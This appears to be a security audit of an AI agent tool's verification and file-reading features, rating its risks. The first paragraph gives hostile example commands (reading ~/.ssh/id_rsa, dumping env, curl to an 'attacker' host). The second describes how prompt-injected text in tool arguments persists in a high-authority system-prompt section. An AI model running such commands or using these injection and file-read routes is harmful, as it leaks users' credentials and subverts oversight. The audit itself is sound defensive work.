exec is dead by default (no DSH_FRUGALITY_VERIFY => verified=null, no run), but when the operator sets DSH_FRUGALITY_ALLOW_ARG_VERIFY=1 the command string comes from the model. sanitizeVerify only rejects shell metacharacters and the keywords rm/del/format/shutdown/reboot/rd, so a single simple command still runs with the host process's privileges and its stdout/stderr is returned to the model (e.g. cat ~/.ssh/id_rsa, env, curl http://attacker/?x=…). Reachable end-to-end only behind that explicit opt-in env flag and a prompt-injectable model turn.

targetOf takes up to 120 chars from model-supplied tool arguments (path/pattern/url/query). Those strings — which can be shaped by untrusted file content the model just read — are stored in lastReads and re-emitted on every assemble into a system-prompt section explicitly designed to survive context compaction, giving attacker-influenced text a persistent higher-authority position inside the session prompt.

A model-supplied path is passed straight to existsSync/readFileSync with the host process's privileges. There is no workspace containment (realpath prefix check) and no use of the host's normal read tool/approval flow, so any *.json/*.txt/*.md/*.js/… file the process can read — including paths outside the project — can be pulled into the review prompt, and the resulting output exposes a file-existence oracle.

Static critical is refuted: exec is off by default and host-gated; still, ALLOW_ARG_VERIFY=1 lets a weak sanitizer pass simple model-supplied commands (medium).

Rule: the dynamic audit can only raise risk, never lower it (raise-only, never an exemption); a wrong raise is withdrawn by human review and the tier falls back to the static verdict. Overall verdict = the stricter of the two layers.
